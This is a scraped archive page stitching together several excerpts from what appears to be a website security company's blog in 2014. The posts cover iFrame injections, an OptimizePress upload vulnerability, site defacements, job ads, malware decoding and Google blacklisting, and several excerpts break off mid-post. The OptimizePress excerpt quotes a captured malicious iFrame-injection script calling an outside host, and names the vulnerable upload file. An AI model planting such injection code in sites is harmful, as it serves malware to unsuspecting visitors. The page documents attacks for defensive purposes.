Many Pieces of a Puzzle: Target, Neiman Marcus and Website Hacking

Corporations get hacked all the time. This is not news to anyone in the security business, but it has certainly received a lot of attention from those in the media over the last few weeks because of a couple of large-scale credit card events at both Target and Neiman Marcus.


New iFrame Injections Leverage PNG Image Metadata

We’re always trying to stay ahead of the latest trends, and today we caught a very interesting one that we have either been missing, or it’s new. We’ll just say it’s new. ;)

We’re all familiar with the idea of iFrame Injections, right?

Understanding an iFrame Injection

The iFrame HTML tag is very standard today; it’s an easy way to embed content from another site into your own. It’s supported by almost all browsers and employed by millions of websites. Use AdSense? Then you have an iFrame embedded within your site too.

Pretty nifty, I know. Like with most things though, the good is always accompanied by the bad.


Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptimizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iFrames that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptimizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" 
height="1"></iframe>"



Sucuri Company Meeting – Brazil 2014

2013 was a great year for Sucuri! We were able to add some great services and tools like CloudProxy to help website owners and administrators fight malware. We also grew the Sucuri team quite a bit in an effort to support our products, and more importantly our customers.

We’re very excited about the future, so much so that we pulled in the team for a company meeting to kick off 2014 strong.

As you can see, always working together as a team, even during some sightseeing. In 2014 we expect to continue building the team, and also continue to offer the best malware protective, monitoring, and remediation tools for website owners.

Here is a small gallery of photos taken during the event.

We’ll try to post more images and videos throughout the week. We hope you enjoy!


If you’re looking for new opportunities and want to join an awesome website security company, check out the Sucuri Employment page.

Friday the 13th – A Gallery of Webmaster Nightmares

This post is dedicated to all you geeky horror movie fans out there!

One morning you open your website and don’t recognize it. Something is devastatingly wrong. You wipe the sleep from your eyes, and instantly you know that you’re living your worst nightmare…

As you gain early morning focus from what you thought was a good night’s sleep, a scary face stares back at you, and declares that you’ve been hacked!

When you see it you know it’s, it’s…it’s…it’s Friday the 13th!!!

[Image: Hacked Website Defacement]

It’s always Friday the 13th for webmasters of defaced sites, regardless of what their calendar says. It becomes the most unlucky day in their webmaster life, the day when only bad things can happen.

[Image: Hacked Website Defacement 2]

We, at Sucuri, come across such hacked sites every day. Every day we help website owners like you survive your Friday the 13th. We restore your sites and make sure this doesn’t happen again.

When your site is finally restored, and you calm down after the stressful fight for your site, it may eventually occur to you that the defaced page was a piece of some weird modern cyber art.

[Image: Hacked Website Defacement 3]

OK, maybe you weren’t comparing your defacement to your favorite Van Gogh. We have seen defaced websites every day for the last few years, and after a while you start finding artistic value in some of the “hacked by..” pages you come across.

Sometimes they are disturbing and offensive, sometimes they are scary. Sometimes they are funny, and sometimes they even provide security advice.
In the end, they all reflect the sub-culture of h4x0r$.

[Image: Hacked Website Defacement 4]

In this post, we’d like to share our collection of screenshots of defaced websites. Lean back and submerge into the world of cyber-chaos.
Once you emerge back from the craziness, think to yourself, and ask yourself the simple question, “Am I prepared to deal with such unfortunate events?”

[Screenshots: Hacked Website Defacement 5 through 13]

You can find 100 more screenshots and the whole collection on the Sucuri Facebook page.

——————

Have you encountered such defaced pages on the Internet? Share your own website nightmare, on this eerie Friday the 13th!

WordPress OptimizePress Theme – File Upload Vulnerability

We’re a few days short on this, but it’s still worth releasing as the number of attacks against this vulnerability is increasing ten-fold.

The folks at OSIRT were the first to report this in late November, 2013. In our cases we’re seeing mostly defacement attacks, and although not devastating, they can be a big nuisance for an unsuspecting website owner.

Please be sure to read the official announcement by the OptimizePress team.

This is an important announcement for OptimizePress 1.0 users. (Please note this does NOT apply to OptimizePress 2.0 which is built with a completely new codebase)

Back in April 2013 we discovered a potential security flaw in part of the code for OptimizePress 1.0. Our developers quickly patched this issue and we released an update to the platform. We also announced this to our customers via email, although it appears now that many of our users may not have received this email. – OptimizePress Team (Read Full)

The Vulnerability

The target of the attack is the following file: lib/admin/media-upload.php. It can be used to upload any file to the wp-content/uploads/optpress/images_comingsoon directory. It doesn’t even change the extension.

Vulnerable versions of this file provide the upload functionality to anyone, while newer patched versions check for the admin permissions first. It is easy to tell one from the other.

The beginning of the vulnerable files:


Sucuri is Hiring – Employment Opportunities

It’s always an exciting time when we can reach out to our community and let folks know that there are new opportunities to join our company. That is where we find ourselves today.

We have reached a point where we need to reach out again and continue our growth trajectory. We are looking for a few good men and women in a variety of fields to join us.

Do you fit any of these?

If so, then let us know because we want to hear from you.


System Administrator (022517)

Technical Requirements:

  • Strong system administration and networking experience
  • Linux Knowledge – High
  • Nginx / Apache – High
  • OpenSSL – High
  • Shell Scripting – High
  • HIDS / IPS / IDS – High

Senior PHP Developer / Ops (022514)

Technical Requirements:

  • Senior developer who can write lean, secure PHP 5 code
  • Ability to adapt to various languages
  • Linux administration and management experience – Plus
  • Firm understanding of security principles and use of good security practices
  • Broad understanding of web architecture and scalable platforms

Senior Security Researcher (022515)

Technical Requirements:

  • Experience white-hat hacking and finding vulnerabilities in web applications / web stacks.
  • Experience with a variety of programming languages, frameworks (WordPress, Joomla, vBulletin, Wiki, etc.) and an understanding of how to exploit them.
  • Strong understanding of PHP and SQL is a plus
  • Ability to write Proof of Concepts against vulnerabilities is a plus
  • Knowledge of research and white hat security tools
  • You can take a web site, find vulnerabilities, suggest fixes and build ways to prevent that from being exploited
  • Malware decoding experience is a plus

Senior Frontend Developer (022516)

Technical Requirements:

  • Strong HTML, JavaScript and CSS experience
  • Ability to effectively convert designs to functional front-end code
  • Familiarity with CMS applications (e.g., WordPress, Joomla, etc.) is a plus
  • You have built other products before and know what it takes to create responsive and intuitive design

Please submit your resume

If any of these positions sound like something you think you’d be able to excel at then we want to hear from you. Send us an email with your resume to jobs@sucuri.net, and let us know why you’d be awesome to work with.


How We Decoded Some Nasty Multi-Level Encoded Malware

From time to time, we come up with interesting bits of malware that are just calling us to decode and learn more about them. This is one of those cases.

Recently, I crossed paths with this little gem:

[Image: dissecting-malware-step-1]

That snippet is encoded malicious content. The full payload is much bigger, 12816 characters, to be exact. Seems benign, right? At least it looks interesting. So interesting that I decided to dissect it, piece by piece.


Another Fake WordPress Plugin – And Yet Another SPAM Infection!

We clean hundreds and thousands of infected websites, and a lot of the cleanups can be considered somewhat “routine”. If you follow our blog, you often hear us say we’ve seen “this” numerous times, we’ve cleaned “that” numerous times.

In most cases when dealing with infected websites, we know where to look and what to remove; generally, with a quick look, we can determine what’s going on. Despite our experience and passion for cleaning up a hacked website, there are always surprises lurking and waiting for us, almost every day.

Some of the most interesting routine cases we deal with are often websites with SPAM. SPAM is in the database, or the whole block of SPAM code is stored in some obscure file. We also deal with cases where the SPAM is loaded within the theme or template header, footer, index, etc. Sometimes these SPAM infections are conditional (e.g., they only appear once per IP), sometimes not.

More often than not, however, these infections are not too difficult to identify and remove. In the case we’re writing about in this post, we were able not only to remove malware, but also take a look at what’s going on behind the curtain.


Understanding Google’s Blacklist – Cleaning Your Hacked Website and Removing From Blacklist

Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The idea is to provide you webmasters with the required insight to understand what is going on, and how to troubleshoot things when your website is blacklisted.

Get Your Bearing

While investigating the website, we found that some Google shortened URLs were being loaded and redirecting to http://bls.pw/. Two of the goo.gl links were pointing to Wikipedia images, their icon to be specific, and one was redirecting to the http://bls.pw/ shortener.

goo.gl/9yBTe - http://bits.wikimedia.org/favicon/wikipedia.ico
goo.gl/hNVXP - http://bits.wikimedia.org/favicon/wikipedia.ico?2x2
goo.gl/24vi1 - http://bls.pw/

A quick search for this last URL took us to /wp-content/themes/Site’sTheme/css/iefix.sct. As malware writers like to do, it was trying to trick us into believing it was good code. In this case, the Sizzle CSS Selector Engine code (Real code here) was the target:

[Image: Sucuri Sizzle CSS Selector Engine Modified III]
